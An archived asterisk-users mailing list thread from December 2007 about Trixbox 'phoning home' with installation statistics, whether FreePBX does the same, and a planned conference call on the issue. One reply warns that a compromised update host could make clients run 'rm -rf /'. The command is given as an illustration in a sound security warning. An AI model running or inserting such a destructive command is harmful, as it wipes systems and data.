I just read on Slashdot (at http://yro.slashdot.org/article.pl?sid=07/12/16/222243 ) that Trixbox "has been phoning home with statistics about their installations", as a Trixbox user exposed in "Trixbox Phones Home" at http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home . -- (C) Matthew Rubenstein
As I pointed out here last night, there is also a very serious security vulnerability associated with this. Example: An attacker could compromise the script that is used on the remote host, and set it to force clients that connect to run a command such as "rm -rf /". There are about half a dozen ways I could see this being abused - in either a "one off" or an "every installation" scenario. Fonality has yet to acknowledge this aspect of the issue - and I fear that they never will. See: http://voipsa.org/pipermail/voipsec_voipsa.org/2007-December/002522.html P.S.: On behalf of Rob (of FreePBX fame), I'd like to also point out this this is something that was added to trixbox, and not FreePBX. Quoting Rob: "when someone mistakenly says 'trixbox does...' they usually mean 'freepbx does...' as FreePBX is the GUI Trixbox uses to configure Asterisk". In this instance, that is not the case - it is only a trixbox issue.> From: email at mattruby.com > To: asterisk-users at lists.digium.com; asterisk-biz at lists.digium.com > Date: Sun, 16 Dec 2007 20:53:53 -0500 > Subject: [asterisk-users] Trixbox Phones Home > > I just read on Slashdot (at > http://yro.slashdot.org/article.pl?sid=07/12/16/222243 ) that Trixbox > "has been phoning home with statistics about their installations", as a > Trixbox user exposed in "Trixbox Phones Home" at > http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home . > -- > > (C) Matthew Rubenstein > > > _______________________________________________ > --Bandwidth and Colocation Provided by http://www.api-digital.com-- > > asterisk-users mailing list > To UNSUBSCRIBE or update options visit: > http://lists.digium.com/mailman/listinfo/asterisk-users_________________________________________________________________ The best games are on Xbox 360. Click here for a special offer on an Xbox 360 Console. http://www.xbox.com/en-US/hardware/wheretobuy/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.digium.com/pipermail/asterisk-users/attachments/20071216/af4cf7e1/attachment.htm
Thanks Tzafrir! I really appreciate Free PBX. Keep on going your good job. Best regards, Mouta On Dec 18, 2007 11:59 AM, Tzafrir Cohen <tzafrir.cohen at xorcom.com> wrote:> On Tue, Dec 18, 2007 at 11:38:03AM +0000, Marco Mouta wrote: > > In > > > http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home > > is said Kerry Garrison that: > > > > Both trixbox and FreePBX have phone-home mechanisms in them. > > > > So does FreePBX phones home too? > > And if you read further down that thread you would have seen the reply > by philippel of FreePBX: > > ... > | The only time this happens is when an online update is initiated by you, > | or if you have chosen to receive update notifications since those are > | nothing more then a cron Job that does exactly what "Check for Online > | Updates" does in the GUI. > ... > > -- > Tzafrir Cohen > icq#16849755 jabber:tzafrir.cohen at xorcom.com > +972-50-7952406 mailto:tzafrir.cohen at xorcom.com > http://www.xorcom.com iax:guest at local.xorcom.com/tzafrir > > _______________________________________________ > --Bandwidth and Colocation Provided by http://www.api-digital.com-- > > asterisk-users mailing list > To UNSUBSCRIBE or update options visit: > http://lists.digium.com/mailman/listinfo/asterisk-users >-- Esta mensagem (incluindo quaisquer anexos) pode conter informa??o confidencial para uso exclusivo do destinat?rio. Se n?o for o destinat?rio pretendido, n?o dever? usar, distribuir ou copiar este e-mail. Se recebeu esta mensagem por engano, por favor informe o emissor e elimine-a imediatamente. Obrigado. This e-mail message is intended only for individual(s) to whom it is addressed and may contain information that is privileged, confidential, proprietary, or otherwise exempt from disclosure under applicable law. If you believe you have received this message in error, please advise the sender by return e-mail and delete it from your mailbox. Thank you. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.digium.com/pipermail/asterisk-users/attachments/20071218/417c3a89/attachment.htm
> We expect Kerry Garrison to respond to this live Friday 21st Dec at 12 > Noon EST with what steps they are taking and why. > http://VoipUsersConference.org > IRC: #voip-users-conference on Freenode.netThanks to all who participated in the call. A lot of interesting side issues came up such as who should make money on what. It always amazes me the distance between the diametrically opposed viewpoints but I think we can all agree that we wish the entire asterisk community a great 2008 and a Wonderful, Frank Cappa-esque life The mp3 recordings of all calls are available in a list here: http://food4wine.ning.com/conference Happy, Prosperous and meaningful New Year to all! Next week, VOIP 2007 in review. January Conference Highlights: Jan 4th, Mark Spencer mid-January: Junction Networks randy